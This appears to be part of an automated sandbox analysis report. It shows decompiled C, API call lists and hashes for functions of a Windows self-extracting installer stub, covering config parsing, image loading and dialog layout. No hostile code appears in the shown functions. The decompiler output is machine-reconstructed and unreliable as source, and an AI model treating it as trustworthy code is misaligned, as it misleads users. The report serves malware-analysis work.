                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                            • Part of subcall function 004146A6: memcpy.MSVCRT ref: 004146C9
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401A74
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401A7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$lstrlenmemcpy$??2@$_wcsnicmp_wtol
                                          • String ID: BeginPromptTimeout$GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete$SfxVarCmdLine1$SfxVarCmdLine2$bpt
                                          • API String ID: 2996597252-1537130225
                                          • Opcode ID: 500965716cd358e1f0f6a731afd1e5cdf4dd8bccb62de7a40dee37322f493f25
                                          • Instruction ID: bfac2216f2955e65c70ae6ed62231eefb15951875b99b08c111cbab744d5d809
                                          • Opcode Fuzzy Hash: 500965716cd358e1f0f6a731afd1e5cdf4dd8bccb62de7a40dee37322f493f25
                                          • Instruction Fuzzy Hash: F9A1E2719042019ACB28EB65C9915EFB3B5AF40344B20843FE446B36F1EB7C9E85C75D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040502A, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 256COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0040502A(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v36;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				wchar_t* _v100;
				void* __edi;
				void* _t76;
				void* _t86;
				WCHAR* _t88;
				intOrPtr _t89;
				WCHAR* _t90;
				intOrPtr _t92;
				WCHAR* _t96;
				WCHAR* _t99;
				intOrPtr _t100;
				WCHAR* _t104;
				WCHAR* _t105;
				WCHAR* _t110;
				WCHAR* _t111;
				char _t113;
				intOrPtr _t115;
				signed int _t117;
				WCHAR* _t122;
				char _t133;
				signed int _t140;
				char _t142;
				WCHAR* _t154;
				signed int _t162;
				intOrPtr* _t165;
				void* _t167;
				signed int _t168;
				WCHAR* _t169;
				WCHAR** _t170;
				WCHAR* _t171;
				void* _t173;

				_v8 = _v8 & 0x00000000;
				_t165 = __ecx;
				_v12 = __edx;
				E004143C2(_t76,  &_v40);
				L49:
				while(E00403251( &_v8, _t165) != 0) {
					while(1) {
						_v20 = _t133;
						__eflags = E0040322D(_t133);
						if(__eflags != 0) {
							break;
						}
						__eflags = _t133 - 0x3d;
						if(__eflags == 0) {
							break;
						}
						E00402F9F( &_v52, _v20);
						_t122 =  &(_t122[0]);
						__eflags = _t122;
						_t133 =  *((intOrPtr*)(_t167 + _t122));
					}
					E004148C7( &_v100, E00404346( &_v64,  &_v52, __eflags, 0xfde9));
					_push(_v64);
					L0041C160();
					_push(_v52);
					L0041C160();
					__eflags = _t122;
					if(_t122 == 0) {
						_t162 = _v8;
						L53:
						_t86 = E004044E1(_t165, _t162, _v12);
						_push(_v88);
						L0041C160();
						_push(_v100);
						L0041C160();
						_push(_v40);
						L0041C160();
						return _t86;
					}
					_v8 = _t122 + _v8;
					_t163 = _t165;
					_t88 = E00403251( &_v8, _t165);
					__eflags = _t88;
					if(_t88 == 0) {
						L52:
						_t162 = _v16;
						goto L53;
					}
					_t89 =  *_t165;
					_t140 = _v8;
					__eflags =  *((char*)(_t140 + _t89)) - 0x3d;
					if( *((char*)(_t140 + _t89)) != 0x3d) {
						goto L52;
					}
					_v8 = _v8 + 1;
					_t90 = E00403251( &_v8, _t163);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L52;
					}
					_t168 = _v8;
					_t92 =  *((intOrPtr*)(_t168 +  *_t165));
					__eflags = _t92 - 0x22;
					if(_t92 == 0x22) {
						_t169 = _t168 + 1;
						_v36 = _v36 & 0x00000000;
						_v8 = _t169;
						 *_v40 = 0;
						while(1) {
							L29:
							_t96 = strncmp( *_t165 + _t169, "{\\rtf", 5);
							_t173 = _t173 + 0xc;
							__eflags = _t96;
							if(_t96 != 0) {
								goto L28;
							} else {
								break;
							}
							while(1) {
								L28:
								_t99 = strncmp( *_t165 + _t169, "{\\rtf", 5);
								_t173 = _t173 + 0xc;
								__eflags = _t99;
								if(_t99 == 0) {
									goto L29;
								}
								__eflags = _t169 -  *((intOrPtr*)(_t165 + 4));
								if(_t169 >=  *((intOrPtr*)(_t165 + 4))) {
									goto L52;
								}
								_t100 =  *_t165;
								_t142 =  *((intOrPtr*)(_t100 + _t169));
								_t169 =  &(_t169[0]);
								_v28 = _t142;
								_v8 = _t169;
								__eflags = _t142 - 0x22;
								if(__eflags == 0) {
									L39:
									_t164 =  &_v40;
									E004148C7( &_v88, E00404346( &_v76,  &_v40, __eflags, 0xfde9));
									_push(_v76);
									L0041C160();
									E0040457E( &_v88, _t165, __eflags);
									_t104 = lstrcmpW(_v100, L"SetEnvironment");
									__eflags = _t104;
									if(_t104 != 0) {
										L41:
										__eflags =  *0x422120;
										_t170 = 0x422120;
										if( *0x422120 == 0) {
											L45:
											_t164 = 0;
											_t105 = E00404F11(_v100, 0);
											__eflags = _t105;
											if(_t105 == 0) {
												L47:
												E0040287B( &_v100, 0x4227a0, _t164,  &_v100);
												L48:
												_push(_v88);
												L0041C160();
												_push(_v100);
												L0041C160();
												goto L49;
											}
											_t64 =  &(_t105[6]); // 0xc
											E00414864(_t64, _v88);
											goto L48;
										} else {
											goto L42;
										}
										while(1) {
											L42:
											_t110 = wcsncmp(_v100,  *_t170, lstrlenW( *_t170));
											_t173 = _t173 + 0xc;
											__eflags = _t110;
											if(_t110 == 0) {
												break;
											}
											_t170 =  &(_t170[1]);
											__eflags =  *_t170;
											if( *_t170 != 0) {
												continue;
											}
											break;
										}
										__eflags =  *_t170;
										if( *_t170 != 0) {
											goto L47;
										}
										goto L45;
									}
									_t164 = 0x3d;
									_t111 = E0041420C(_v88,  &_v40);
									__eflags = _t111;
									if(_t111 <= 0) {
										goto L52;
									}
									goto L41;
								}
								__eflags = _t142 - 0x5c;
								if(_t142 != 0x5c) {
									_push(_v28);
									L26:
									_t153 =  &_v40;
									L27:
									E00402F9F(_t153);
									continue;
								}
								_t113 =  *((intOrPtr*)(_t100 + _t169));
								_t169 =  &(_t169[0]);
								_v24 = _t113;
								_v8 = _t169;
								__eflags = _t113 - 0x22;
								if(_t113 == 0x22) {
									_push(0x22);
									goto L26;
								}
								__eflags = _t113 - _t142;
								if(_t113 == _t142) {
									_push(0x5c);
									goto L26;
								}
								__eflags = _t113 - 0x6e;
								if(_t113 == 0x6e) {
									_push(0xa);
									goto L26;
								}
								_t153 =  &_v40;
								__eflags = _t113 - 0x74;
								if(_t113 == 0x74) {
									_push(9);
									goto L27;
								}
								E00402F9F( &_v40, 0x5c);
								_push(_v24);
								goto L26;
							}
						}
						while(1) {
							_t115 =  *_t165;
							_t154 =  *(_t115 + _t169);
							__eflags = _t154;
							if(_t154 == 0) {
								break;
							}
							__eflags = _t154 - 0x22;
							if(_t154 == 0x22) {
								break;
							}
							__eflags = _t154 - 0x5c;
							if(_t154 == 0x5c) {
								__eflags =  *((char*)(_t115 +  &(_t169[0]))) - 0x22;
								if( *((char*)(_t115 +  &(_t169[0]))) == 0x22) {
									_t169 =  &(_t169[0]);
									__eflags = _t169;
								}
							}
							_t117 =  *(_t115 + _t169) & 0x000000ff;
							_t169 =  &(_t169[0]);
							__eflags = _t169;
							_v8 = _t169;
							E00402F9F( &_v40, _t117);
						}
						__eflags =  *((char*)(_t169 +  *_t165));
						if(__eflags != 0) {
							_t171 =  &(_t169[0]);
							__eflags = _t171;
							_v8 = _t171;
						}
						goto L39;
					}
					__eflags = _t92 - 0x2d;
					if(_t92 != 0x2d) {
						goto L52;
					}
					E00404FEE(_v100);
					_v8 = _t168 + 1;
					goto L48;
				}
				_push(_v40);
				L0041C160();
				return 1;
			}














































                                          0x00405030
                                          0x00405037
                                          0x0040503c
                                          0x0040503f
                                          0x00000000
                                          0x004052c4
                                          0x00405085
                                          0x00405087
                                          0x0040508f
                                          0x00405091
                                          0x00000000
                                          0x00000000
                                          0x00405071
                                          0x00405074
                                          0x00000000
                                          0x00000000
                                          0x0040507c
                                          0x00405081
                                          0x00405081
                                          0x00405082
                                          0x00405082
                                          0x004050a7
                                          0x004050ac
                                          0x004050af
                                          0x004050b4
                                          0x004050b7
                                          0x004050be
                                          0x004050c0
                                          0x004052e3
                                          0x004052eb
                                          0x004052f0
                                          0x004052f5
                                          0x004052fa
                                          0x004052ff
                                          0x00405302
                                          0x00405307
                                          0x0040530a
                                          0x00000000
                                          0x00405311
                                          0x004050c6
                                          0x004050cc
                                          0x004050ce
                                          0x004050d3
                                          0x004050d5
                                          0x004052e8
                                          0x004052e8
                                          0x00000000
                                          0x004052e8
                                          0x004050db
                                          0x004050dd
                                          0x004050e0
                                          0x004050e4
                                          0x00000000
                                          0x00000000
                                          0x004050ea
                                          0x004050f0
                                          0x004050f5
                                          0x004050f7
                                          0x00000000
                                          0x00000000
                                          0x004050ff
                                          0x00405102
                                          0x00405105
                                          0x00405107
                                          0x0040512b
                                          0x0040512c
                                          0x00405130
                                          0x00405133
                                          0x004051b4
                                          0x004051b4
                                          0x004051c0
                                          0x004051c2
                                          0x004051c5
                                          0x004051c7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040519f
                                          0x0040519f
                                          0x004051ab
                                          0x004051ad
                                          0x004051b0
                                          0x004051b2
                                          0x00000000
                                          0x00000000
                                          0x00405138
                                          0x0040513b
                                          0x00000000
                                          0x00000000
                                          0x00405141
                                          0x00405143
                                          0x00405146
                                          0x00405147
                                          0x0040514a
                                          0x0040514d
                                          0x00405150
                                          0x00405203
                                          0x00405208
                                          0x00405217
                                          0x0040521c
                                          0x0040521f
                                          0x00405228
                                          0x00405235
                                          0x0040523b
                                          0x0040523d
                                          0x00405252
                                          0x00405252
                                          0x00405259
                                          0x0040525e
                                          0x00405289
                                          0x0040528c
                                          0x0040528e
                                          0x00405293
                                          0x00405295
                                          0x004052a4
                                          0x004052ad
                                          0x004052b2
                                          0x004052b2
                                          0x004052b5
                                          0x004052ba
                                          0x004052bd
                                          0x00000000
                                          0x004052c3
                                          0x0040529a
                                          0x0040529d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405260
                                          0x00405260
                                          0x0040526f
                                          0x00405275
                                          0x00405278
                                          0x0040527a
                                          0x00000000
                                          0x00000000
                                          0x0040527c
                                          0x0040527f
                                          0x00405282
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405282
                                          0x00405284
                                          0x00405287
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405287
                                          0x00405244
                                          0x00405245
                                          0x0040524a
                                          0x0040524c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040524c
                                          0x00405156
                                          0x00405159
                                          0x00405194
                                          0x00405197
                                          0x00405197
                                          0x0040519a
                                          0x0040519a
                                          0x00000000
                                          0x0040519a
                                          0x0040515b
                                          0x0040515e
                                          0x0040515f
                                          0x00405162
                                          0x00405165
                                          0x00405167
                                          0x00405190
                                          0x00000000
                                          0x00405190
                                          0x00405169
                                          0x0040516b
                                          0x0040518c
                                          0x00000000
                                          0x0040518c
                                          0x0040516d
                                          0x0040516f
                                          0x00405188
                                          0x00000000
                                          0x00405188
                                          0x00405171
                                          0x00405174
                                          0x00405176
                                          0x00405184
                                          0x00000000
                                          0x00405184
                                          0x0040517a
                                          0x0040517f
                                          0x00000000
                                          0x0040517f
                                          0x0040519f
                                          0x004051ee
                                          0x004051ee
                                          0x004051f0
                                          0x004051f3
                                          0x004051f5
                                          0x00000000
                                          0x00000000
                                          0x004051cb
                                          0x004051ce
                                          0x00000000
                                          0x00000000
                                          0x004051d0
                                          0x004051d3
                                          0x004051d5
                                          0x004051da
                                          0x004051dc
                                          0x004051dc
                                          0x004051dc
                                          0x004051da
                                          0x004051dd
                                          0x004051e1
                                          0x004051e1
                                          0x004051e6
                                          0x004051e9
                                          0x004051e9
                                          0x004051f9
                                          0x004051fd
                                          0x004051ff
                                          0x004051ff
                                          0x00405200
                                          0x00405200
                                          0x00000000
                                          0x004051fd
                                          0x00405109
                                          0x0040510b
                                          0x00000000
                                          0x00000000
                                          0x00405114
                                          0x0040511a
                                          0x00000000
                                          0x0040511a
                                          0x004052d6
                                          0x004052d9
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID: !B$SetEnvironment${\rtf
                                          • API String ID: 4113381792-3096309559
                                          • Opcode ID: 752242ab35c35d5e209c1fae2a3803e2279e1fa1f55af9a48d81166611632b2d
                                          • Instruction ID: b708b963da35919fffc77302d43656a91cdc81ec60feee5546b613eda411056e
                                          • Opcode Fuzzy Hash: 752242ab35c35d5e209c1fae2a3803e2279e1fa1f55af9a48d81166611632b2d
                                          • Instruction Fuzzy Hash: 69917C34900619ABCF15EB91C991BEFB7B1EF55308F2000ABE4427B2D2DA785E45DF49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403B31, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121windowcommemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E00403B31(struct HWND__* __ecx) {
				int _v8;
				long _v12;
				void* _v16;
				struct HWND__* _v20;
				void* _v24;
				int _v40;
				int _v44;
				void _v48;
				char _v112;
				char* _t41;
				intOrPtr* _t44;
				intOrPtr* _t47;
				intOrPtr* _t49;
				void* _t53;
				void* _t57;
				void* _t67;
				struct HWND__* _t68;

				_t68 = __ecx;
				_v20 = __ecx;
				if(GetClassNameA(__ecx,  &_v112, 0x40) == 0 || lstrcmpiA( &_v112, "STATIC") != 0 || (GetWindowLongW(_t68, 0xfffffff0) & 0x0000000e) == 0) {
					L13:
					return 0;
				} else {
					_t57 = E00403908("IMAGES", GetMenu(_t68),  &_v12);
					if(_t57 == 0 || _v12 < 0x10) {
						goto L13;
					} else {
						_t67 = GlobalAlloc(0x40, _v12);
						if(_t67 == 0) {
							goto L13;
						}
						memcpy(_t67, _t57, _v12);
						__imp__CoInitialize(0);
						_t41 =  &_v16;
						__imp__CreateStreamOnHGlobal(_t67, 0, _t41);
						if(_t41 != 0 || _v16 == 0) {
							GlobalFree(_t67);
							goto L13;
						} else {
							__imp__#418(_v16, 0, 0, 0x41fa34,  &_v24);
							_t44 = _v16;
							 *((intOrPtr*)( *_t44 + 8))(_t44);
							GlobalFree(_t67);
							_t47 = _v24;
							if(_t47 == 0) {
								goto L13;
							}
							_v8 = 0;
							 *((intOrPtr*)( *_t47 + 0xc))(_t47,  &_v8);
							_t62 = _v8;
							if(_v8 != 0) {
								_t53 = E004039F1(_t62);
								_v8 = _t53;
								GetObjectW(_t53, 0x18,  &_v48);
								SetWindowPos(_v20, 0, 0, 0, _v44, _v40, 6);
								SendMessageW(_v20, 0x172, 0, _v8);
							}
							_t49 = _v24;
							 *((intOrPtr*)( *_t49 + 8))(_t49);
							return 1;
						}
					}
				}
			}




















                                          0x00403b3f
                                          0x00403b43
                                          0x00403b4e
                                          0x00403c7e
                                          0x00000000
                                          0x00403b7c
                                          0x00403b93
                                          0x00403b99
                                          0x00000000
                                          0x00403ba9
                                          0x00403bb4
                                          0x00403bb8
                                          0x00000000
                                          0x00000000
                                          0x00403bc3
                                          0x00403bcc
                                          0x00403bd2
                                          0x00403bd8
                                          0x00403be0
                                          0x00403c78
                                          0x00000000
                                          0x00403bef
                                          0x00403bfd
                                          0x00403c03
                                          0x00403c09
                                          0x00403c0d
                                          0x00403c13
                                          0x00403c18
                                          0x00000000
                                          0x00000000
                                          0x00403c1e
                                          0x00403c24
                                          0x00403c27
                                          0x00403c2c
                                          0x00403c2e
                                          0x00403c3a
                                          0x00403c3d
                                          0x00403c51
                                          0x00403c63
                                          0x00403c63
                                          0x00403c69
                                          0x00403c6f
                                          0x00000000
                                          0x00403c74
                                          0x00403be0
                                          0x00403b99

                                          APIs
                                          • GetClassNameA.USER32(?,?,00000040), ref: 00403B46
                                          • lstrcmpiA.KERNEL32(?,STATIC,?,?,00000040), ref: 00403B5D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00403B6E
                                          • GetMenu.USER32 ref: 00403B81
                                            • Part of subcall function 00403908: GetModuleHandleW.KERNEL32(00000000), ref: 00403919
                                            • Part of subcall function 00403908: FindResourceExA.KERNEL32(00000000,?,?), ref: 00403937
                                            • Part of subcall function 00403908: FindResourceExA.KERNEL32(?,?,?,00000409), ref: 0040394E
                                            • Part of subcall function 00403908: SizeofResource.KERNEL32(?,00000000), ref: 00403961
                                            • Part of subcall function 00403908: LoadResource.KERNEL32(?,00000000), ref: 0040396D
                                            • Part of subcall function 00403908: LockResource.KERNEL32(00000000), ref: 00403978
                                          • GlobalAlloc.KERNEL32(00000040,00000010,?,?,000000F0,?,?,00000040), ref: 00403BAE
                                          • memcpy.MSVCRT ref: 00403BC3
                                          • CoInitialize.OLE32(00000000), ref: 00403BCC
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00403BD8
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041FA34,?), ref: 00403BFD
                                          • GlobalFree.KERNEL32 ref: 00403C0D
                                            • Part of subcall function 004039F1: GetWindowDC.USER32(00000000), ref: 00403A00
                                            • Part of subcall function 004039F1: GetDeviceCaps.GDI32(00000000,00000058), ref: 00403A0C
                                            • Part of subcall function 004039F1: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403A25
                                            • Part of subcall function 004039F1: GetObjectW.GDI32(?,00000018,?), ref: 00403A5C
                                            • Part of subcall function 004039F1: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403A69
                                            • Part of subcall function 004039F1: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403A75
                                            • Part of subcall function 004039F1: CreateCompatibleDC.GDI32(?), ref: 00403A83
                                            • Part of subcall function 004039F1: CreateCompatibleDC.GDI32(?), ref: 00403A8B
                                            • Part of subcall function 004039F1: SelectObject.GDI32(00000002,?), ref: 00403A9B
                                            • Part of subcall function 004039F1: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403AA9
                                            • Part of subcall function 004039F1: SelectObject.GDI32(00000000,00000000), ref: 00403AB1
                                            • Part of subcall function 004039F1: SetStretchBltMode.GDI32(00000000,00000004), ref: 00403AB9
                                            • Part of subcall function 004039F1: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403AD8
                                            • Part of subcall function 004039F1: GetCurrentObject.GDI32(00000000,00000007), ref: 00403AE1
                                            • Part of subcall function 004039F1: SelectObject.GDI32(00000002,?), ref: 00403AF0
                                            • Part of subcall function 004039F1: SelectObject.GDI32(00000000,?), ref: 00403AF6
                                            • Part of subcall function 004039F1: DeleteDC.GDI32(00000002), ref: 00403B01
                                            • Part of subcall function 004039F1: DeleteDC.GDI32(00000000), ref: 00403B04
                                            • Part of subcall function 004039F1: ReleaseDC.USER32 ref: 00403B0A
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00403C3D
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00403C51
                                          • SendMessageW.USER32(?,00000172,00000000,?), ref: 00403C63
                                          • GlobalFree.KERNEL32 ref: 00403C78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                          • String ID: IMAGES$STATIC
                                          • API String ID: 4202116410-1168396491
                                          • Opcode ID: 0927fdd96c8a672e4edb8bf6fba54bde9fa129fa8547b2b49592ff7c41df4a32
                                          • Instruction ID: b651b05a898d6b36c18c6da2e71faa2375cac1702eff8c2c698f256589fd88ae
                                          • Opcode Fuzzy Hash: 0927fdd96c8a672e4edb8bf6fba54bde9fa129fa8547b2b49592ff7c41df4a32
                                          • Instruction Fuzzy Hash: 5A412CB2A00218BBDB119FA1CD48DEFBF7DEF4A701B104466F915F2190D7788A41CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407ACF, Relevance: 27.3, APIs: 18, Instructions: 297COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E00407ACF(void* __ecx, int __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				int _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				int _v32;
				struct tagRECT _v48;
				intOrPtr _t116;
				int _t118;
				int _t120;
				struct HWND__* _t131;
				int _t139;
				void* _t166;
				signed int _t168;
				int _t210;
				struct HWND__* _t211;
				long _t215;
				intOrPtr _t219;
				intOrPtr _t225;
				int _t231;
				int _t234;
				int _t235;
				void* _t239;

				_t234 = __edx;
				_t239 = __ecx;
				_v28 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				if((GetWindowLongW(GetDlgItem( *(__ecx + 4), 0x4b3), 0xfffffff0) & 0x10000000) != 0) {
					E00407925(_t239, 0x4b3,  &_v48);
					_v28 = 0x4b3;
					_v16 = _v48.right.x - _v48.left;
					_v24 = _v48.bottom - _v48.top;
				}
				if((GetWindowLongW(GetDlgItem( *(_t239 + 4), 0x4b4), 0xfffffff0) & 0x10000000) != 0) {
					E00407925(_t239, 0x4b4,  &_v48);
					_v28 = 0x4b4;
					_v8 = _v48.right.x - _v48.left;
					_v24 = _v48.bottom - _v48.top;
				}
				_t219 = _v16;
				_t116 = _v8;
				if(_t219 > 0 && _t116 > 0) {
					if(_t116 <= _t219) {
						_v8 = _t219;
						_t116 = _t219;
					} else {
						_v16 = _t116;
						_t219 = _t116;
					}
				}
				if(_v28 == 0) {
					L15:
					_t118 = _v12 + 0x1a;
					if(_t118 >  *(_t239 + 0x14)) {
						 *(_t239 + 0x14) = _t118;
					}
					_v12 = _t118 - 0x1a;
					_t120 = GetSystemMetrics(0x10);
					_v32 = GetSystemMetrics(0x11);
					 *(_t239 + 0x14) =  *(_t239 + 0x14) + GetSystemMetrics(8);
					 *(_t239 + 0x18) =  *(_t239 + 0x18) + GetSystemMetrics(7);
					asm("cdq");
					_t210 = _t120 -  *(_t239 + 0x14) - _t234 >> 1;
					asm("cdq");
					_v20 = _v32 -  *(_t239 + 0x18) - _t234 >> 1;
					_t131 = GetParent( *(_t239 + 4));
					_v32 = _t131;
					if(_t131 != 0) {
						GetClientRect(_t131,  &_v48);
						ClientToScreen(_v32,  &_v48);
						ClientToScreen(_v32,  &(_v48.right));
						_t215 = _v48.left;
						_t235 =  *(_t239 + 0x14);
						_t231 = _v48.top;
						_v20 = _t231;
						if(_v48.right.x - _t215 > _t235) {
							asm("cdq");
							_t215 = (_v48.right.x - _t235 - _t215 - _t235 >> 1) + _v48.left;
						}
						_t234 =  *(_t239 + 0x18);
						if(_v48.bottom - _t231 > _t234) {
							asm("cdq");
							_v20 = (_v48.bottom - _t234 - _t231 - _t234 >> 1) + _t231;
						}
						_t210 = _t215 + 0xa;
						_v20 = _v20 + 0xa;
					}
					SetWindowPos( *(_t239 + 4), 0, _t210, _v20,  *(_t239 + 0x14),  *(_t239 + 0x18), 4);
					_t211 = 0;
					if( *((intOrPtr*)(_t239 + 0x30)) == 0) {
						E00407AA0(_t239, 0x4b2, 0xc, 0xa,  *((intOrPtr*)(_t239 + 0x28)) + 1,  *((intOrPtr*)(_t239 + 0x2c)) + 1, 0);
					} else {
						SetWindowPos(GetDlgItem( *(_t239 + 4), 0x4b1), 0, 0xc, 0xc, 0, 0, 5);
						E00407925(_t239, 0x4b1,  &_v48);
						_t225 =  *((intOrPtr*)(_t239 + 0x2c));
						_t166 = 2;
						_v48.bottom = _v48.bottom + _t166 - _v48.top;
						if(_t225 >= _v48.bottom) {
							_t168 = 0;
						} else {
							asm("cdq");
							_t168 = _v48.bottom - _t225 - _t234 >> 1;
						}
						E00407AA0(_t239, 0x4b2, _v48.right.x + 0xb, _t168 + 0xa,  *((intOrPtr*)(_t239 + 0x28)) + 1, _t225 + 1, 0);
						_t211 = 0;
					}
					if(_v28 != _t211) {
						GetClientRect( *(_t239 + 4),  &_v48);
						if(_v16 == _t211 || _v8 == _t211) {
							_push(1);
							_push(_t211);
							_push(_t211);
							_push(_v48.bottom - _v24 - 0xa);
							asm("cdq");
							_push(_v48.right.x - _v12 - _t234 >> 1);
							_push(_v28);
						} else {
							asm("cdq");
							E00407AA0(_t239, 0x4b3, _v48.right.x - _v12 - _t234 >> 1, _v48.bottom - _v24 - 0xa, _v16, _v24, _t211);
							E00407925(_t239, 0x4b3,  &_v48);
							_push(0);
							_push(_v24);
							_push(_v8);
							_push(_v48.top);
							_push(_v48.right.x + 0xa);
							_push(0x4b4);
						}
						E00407AA0(_t239);
					}
					 *(_t239 + 0x14) =  *(_t239 + 0x14) - GetSystemMetrics(8);
					_t139 = GetSystemMetrics(7);
					 *(_t239 + 0x18) =  *(_t239 + 0x18) - _t139;
					return _t139;
				} else {
					if(_t219 == 0) {
						L13:
						_v12 = _t116;
						goto L15;
					}
					if(_t116 == 0) {
						_v12 = _t219;
						goto L15;
					}
					_t116 = _t116 + _t219 + 0xa;
					goto L13;
				}
			}



























                                          0x00407acf
                                          0x00407ae5
                                          0x00407aeb
                                          0x00407aee
                                          0x00407af1
                                          0x00407af4
                                          0x00407b07
                                          0x00407b10
                                          0x00407b1b
                                          0x00407b1e
                                          0x00407b27
                                          0x00407b27
                                          0x00407b43
                                          0x00407b4c
                                          0x00407b57
                                          0x00407b5a
                                          0x00407b63
                                          0x00407b63
                                          0x00407b66
                                          0x00407b69
                                          0x00407b6e
                                          0x00407b76
                                          0x00407b7f
                                          0x00407b82
                                          0x00407b78
                                          0x00407b78
                                          0x00407b7b
                                          0x00407b7b
                                          0x00407b76
                                          0x00407b88
                                          0x00407b9e
                                          0x00407ba1
                                          0x00407ba7
                                          0x00407ba9
                                          0x00407ba9
                                          0x00407bb7
                                          0x00407bba
                                          0x00407bc4
                                          0x00407bc9
                                          0x00407bd0
                                          0x00407bdb
                                          0x00407be6
                                          0x00407be8
                                          0x00407bed
                                          0x00407bf0
                                          0x00407bf6
                                          0x00407bfb
                                          0x00407c02
                                          0x00407c15
                                          0x00407c1e
                                          0x00407c20
                                          0x00407c26
                                          0x00407c29
                                          0x00407c2e
                                          0x00407c33
                                          0x00407c3c
                                          0x00407c43
                                          0x00407c43
                                          0x00407c49
                                          0x00407c50
                                          0x00407c59
                                          0x00407c60
                                          0x00407c60
                                          0x00407c63
                                          0x00407c66
                                          0x00407c66
                                          0x00407c7b
                                          0x00407c81
                                          0x00407c86
                                          0x00407d0c
                                          0x00407c88
                                          0x00407ca1
                                          0x00407cae
                                          0x00407cb3
                                          0x00407cb8
                                          0x00407cbc
                                          0x00407cc2
                                          0x00407cd0
                                          0x00407cc4
                                          0x00407cc9
                                          0x00407ccc
                                          0x00407ccc
                                          0x00407ced
                                          0x00407cf2
                                          0x00407cf2
                                          0x00407d14
                                          0x00407d21
                                          0x00407d2a
                                          0x00407d86
                                          0x00407d88
                                          0x00407d8c
                                          0x00407d8d
                                          0x00407d94
                                          0x00407d99
                                          0x00407d9a
                                          0x00407d31
                                          0x00407d4f
                                          0x00407d56
                                          0x00407d62
                                          0x00407d6a
                                          0x00407d6c
                                          0x00407d72
                                          0x00407d75
                                          0x00407d78
                                          0x00407d79
                                          0x00407d79
                                          0x00407d9f
                                          0x00407d9f
                                          0x00407da8
                                          0x00407dad
                                          0x00407daf
                                          0x00407db6
                                          0x00407b8a
                                          0x00407b8c
                                          0x00407b96
                                          0x00407b96
                                          0x00000000
                                          0x00407b96
                                          0x00407b90
                                          0x00407b9b
                                          0x00000000
                                          0x00407b9b
                                          0x00407b92
                                          0x00000000
                                          0x00407b92

                                          APIs
                                          • GetDlgItem.USER32 ref: 00407AF7
